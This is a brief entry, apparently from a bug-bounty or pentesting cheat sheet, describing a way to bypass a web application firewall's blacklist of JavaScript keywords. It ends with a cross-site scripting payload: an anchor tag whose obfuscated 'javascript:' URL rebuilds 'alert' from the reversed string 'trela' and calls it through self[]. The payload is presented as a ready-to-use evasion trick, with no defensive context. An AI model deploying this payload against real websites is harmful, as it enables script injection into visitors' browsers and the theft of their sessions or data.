Last updated 6 months ago
blackist bypass
If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[].
Payload:
<a%20href=%0dj	avascript:x='trela'.split('').reverse().join('');self[x](origin)>